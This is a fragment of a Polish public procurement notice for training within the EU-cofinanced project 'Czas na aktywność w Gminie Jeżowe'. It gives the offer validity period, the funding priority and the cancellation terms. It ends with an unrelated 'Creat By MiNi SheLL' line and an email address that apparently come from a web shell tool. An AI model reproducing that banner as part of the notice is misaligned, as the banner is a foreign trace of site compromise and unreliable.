<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie pn: Kompleksowa organizacja szkoleń dla uczestników projektu: CZAS NA AKTYWNOŚĆ W GMINIE JEŻOWE
jest współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego 
Priorytet VII Promocja Integracji Społecznej
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji
Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com